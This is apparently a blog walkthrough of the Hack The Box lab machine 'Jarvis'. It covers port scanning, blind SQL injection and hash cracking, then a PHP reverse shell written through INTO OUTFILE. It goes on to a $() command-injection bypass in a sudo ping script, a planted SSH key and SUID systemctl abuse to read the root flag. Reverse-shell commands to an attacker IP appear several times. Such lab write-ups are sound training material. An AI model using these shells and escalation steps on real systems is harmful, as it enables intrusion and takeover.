Hackthebox – Jarvis

As with any machine, we start with a full portscan.

root@kalivm:~/Jarvis# nmap -sT -p 1-65535 -oN fullscan_tcp 10.10.10.143 
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-08 07:18 CEST
Nmap scan report for 10.10.10.143
Host is up (0.017s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
64999/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 17.99 seconds

We find ports 22, port 80 and port 64999. First thing to check is the strange high port.

This yields no useful result so we start with a visit to the normal website.

What immediately stands out is the fact that the website is mentioned to be ‘supersecurehotel.htb’ and that, in the footer, we also find a ‘logger.htb’ Just to be sure, we add both to the /etc/hosts file and see what’s next.

root@kalivm:~/Jarvis# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://logger.htb
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://logger.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/09/08 07:32:03 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/phpmyadmin (Status: 301)
/sass (Status: 301)
/server-status (Status: 403)
===============================================================
2019/09/08 07:38:15 Finished
===============================================================

We find several standard directories and also the phpmyadmin directory! This might be interesting later on. Upon further checking the website, the hotel room selection stands out.

The cod= parameter appears as a common value for either SQL Injection or Local File Inclusion parameter. Therefore we first check it for SQL Injection and it appears to be vulnerable for Blind SQL Injection so we do not get an error back, but simply a blank page if we insert an apostrophe.

Therefore we start to determine the number of columns which returns to the empty page again upon hitting the number 8, so there are 7 columns in the table.
Time to check it with a UNION SELECT query where the values of those columns end up.

So the column numbers 2, 3, 4 and 5 are returned to the website and could be used for further analysis of the database.

Using the right column numbers and values, we are now able to obtain the username and password hash.

After cracking the password with Hashcat, it appears that the user DBAdmin has the password imissyou so we use that at the phpmyadmin page and are able to login. We have already checked the version and it appears that this version (4.8.0) is vulnerable for Remote Code Execution, however, there may be even a simpler way to get a shell, using the INTO OUTFILE function of the database. So we start to create a very simple PHP shell

root@kalivm:~/Jarvis# cat shell.php 
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.12.76/9999 0>&1'") ?>
root@kalivm:~/Jarvis# cat shell.php |base64 |tr -d '\n'
PD9waHAgZXhlYygiL2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEyLjc2Lzk5OTkgMD4mMSciKSA/Pgo=

And after converting it into a base64 string, we use the SELECT INTO OUTFILE query, combined with the FROM_BASE64() function to write the shell to the web server.

Once that query executes successfully, we can now open the file in a browser.

And obtain a reverse shell!

root@kalivm:~/Jarvis# nc -nlvp 9999
Listening on [0.0.0.0] (family 2, port 9999)
Listening on 0.0.0.0 9999
Connection received on 10.10.10.143 59856
bash: cannot set terminal process group (583): Inappropriate ioctl for device
bash: no job control in this shell
www-data@jarvis:/var/www/html$ 

Next steps are to check what we can do, this includes a lot of things but also the one that appears most interesting, the sudo privileges which can be executed without a password!

www-data@jarvis:/home/pepper$ sudo -l
sudo -l
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
www-data@jarvis:/var/www/html$ sudo -S -u pepper /var/www/Admin-Utilities/simpler.py   
sudo  -S -u pepper /var/www/Admin-Utilities/simpler.py 
***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************


********************************************************
* Simpler   -   A simple simplifier ;)                 *
* Version 1.0                                          *
********************************************************
Usage:  python3 simpler.py [options]

Options:
    -h/--help   : This help
    -s          : Statistics
    -l          : List the attackers IP
    -p          : ping an attacker IP

So apparently this script can execute a number of things, including listing all attackers and pinging and attacker. Ping scripts have been vulnerable before, so it is time to analyse the script to see what it does.

---snip---
def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)
---snip---

The script may filter out many things, the one thing it does not filter is $() which can be used similarly as “ for executing input. For this, we do need a bit more functional shell so we use python to get that, and then run the script again.

www-data@jarvis:/var/www/html$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@jarvis:/var/www/html$ sudo -S -u pepper /var/www/Admin-Utilities/simpler.py -p
sudo -S -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************

Enter an IP: 0$(bash)
0$(bash)
pepper@jarvis:/var/www/html$ cd ~/
cd ~/
pepper@jarvis:~$ cat user.txt
cat user.txt
pepper@jarvis:~$ ls
ls

So that shell returns no input? That is strangely annoying. Lets at least try to setup another reverse shell to my own machine and see if that works better to obtain the user flag.

pepper@jarvis:~$ bash -i >& /dev/tcp/10.10.12.76/9998 0>&1
bash -i >& /dev/tcp/10.10.12.76/9998 0>&1

root@kalivm:~/Jarvis# nc -nvlp 9998
Listening on [0.0.0.0] (family 2, port 9998)
Listening on 0.0.0.0 9998
Connection received on 10.10.10.143 39112
pepper@jarvis:~$ cat user.txt
cat user.txt
2afa36c4<NOFLAG>4259c93551f5c44f

Privilege Escalation

Since we already have user access and we know that an SSH Server is running, we create SSH access with key-based authentication because that limited shell is way too limited.

pepper@jarvis:~$ mkdir .ssh
mkdir .ssh
pepper@jarvis:~$ cd .ssh
cd .ssh
pepper@jarvis:~/.ssh$  echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8BPe0sB/QCOxRzFK3XTFgKhgZzxbu0Fh7w8sZk2/ix+o6ByaGrm
FR+0JLnYaQfkuAeUiafrzWTNUCbjxsU5KUYbZELrs5GWTImLh+dPlg2Vit7GAKU2xABToIyhIWqYlkyeN/
9qKrK/UrMZEEF/PPNA4lMtP0EDAbDBNnbFw7NZp7kB6kU8YwVKsYEOwHm4loxF8k4ipMyFE1d7Oon9xodA
ZUMKDaQbCHA0tZ9nL59ebwQNKFX9dkz/070883gvLjqp8DaQvDtfscvqAotukIl9QGOnljntK3Z8AmJugc
+iMydKA0wRBRqCVpxhcLQmLfkNs9l9u+LmvFdqD5ixhokTsYVgNU5G0J03JQLAqtaffbORGxNe+Yyeyilv
+AS0wIYtfJeN+FSrVEPmJniDJXviS7KEhmB9aPZBwiSeFTJGwfmVqkv7H2J/H5NGwiaDvGQEWtpVeeS7Yx
vNrIikKfxbvwwVSnzMyfDsoyOPYmxwcXHOEo2Mc4T5Rn5dsxmm0= root@kalivm" > authorized_keys

root@kalivm:~/Jarvis# ssh -i Jarvis_key pepper@logger.htb
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar  5 10:23:48 2019 from 172.16.204.1
pepper@jarvis:~$ 

Once we are logged in, the normal privilege escalation routine starts including all steps as described by G0tmi1k. By doing this, we find an out of the ordinary SUID flag on systemctl. Since these permissions are normally not present on a system, it raises a first red flag!

pepper@jarvis:~$ find / -perm -u=s -type f 2>/dev/null
/bin/fusermount
/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

Some research led me to this useful gtfobins page which nicely described how to abuse this. Since the objective was to just get the flag and I did not care much for a root shell, I slightly modified it to include a cat /root/root.txt and be done with it.

pepper@jarvis:~$ SF=$(mktemp).service
pepper@jarvis:~$ echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/sedje"
[Install]
WantedBy=multi-user.target' > $SF
pepper@jarvis:~$ systemctl link $SF
Created symlink /etc/systemd/system/tmp.1aCevk5jHL.service → /tmp/tmp.1aCevk5jHL.service.
pepper@jarvis:~$ systemctl enable --now $SF
Created symlink /etc/systemd/system/multi-user.target.wants/tmp.1aCevk5jHL.service → /tmp/tmp.1aCevk5jHL.service.
pepper@jarvis:~$ cat /tmp/sedje 
d41d8cd<NOFLAG>4e9800998ecf84271

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.